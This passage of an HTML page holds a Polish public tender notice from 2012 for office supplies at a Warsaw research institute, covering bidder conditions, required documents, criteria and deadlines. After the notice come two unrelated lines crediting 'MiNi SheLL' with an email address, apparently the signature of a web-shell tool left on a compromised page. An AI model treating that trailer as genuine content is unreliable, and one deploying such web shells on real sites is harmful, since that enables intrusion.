wykonali lub wykonują w ciągu ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 dostawy polegające na dostarczaniu w ramach jednej umowy materiałów biurowych o wartości co najmniej 100 000,00 brutto każda.

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych warunków w pkt 6 przedmiotowego postępowania oświadczeń i dokumentów, wg formuły  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załącznik nr 2 do SIWZ oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, załącznik nr 5 do SIWZ- formularz cenowy, pełnomocnictwo o ile ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.2.	Zamawiający dopuszcza możliwość zmian zawartej umowy w następujących okolicznościach:
a) w przypadku zmiany adresu , nazwy, statusu firmy (Wykonawcy),
b) w przypadku urzędowej zmiany wysokości stawki Vat poprzez wprowadzenie nowej stawki Vat dla towarów i usług, których ta zmiana będzie dotyczyć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ierigz.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Ekonomiki Rolnictwa i Gospodarki Żywnościowej - Państwowy Instytut Badawczy
00-002 Warszawa, ul. Świętokrzyska 
pokój 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 10:00, miejsce: Instytut Ekonomiki Rolnictwa i Gospodarki Żywnościowej - Państwowy Instytut Badawczy
00-002 Warszawa, ul. Świętokrzyska 
pokój 212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com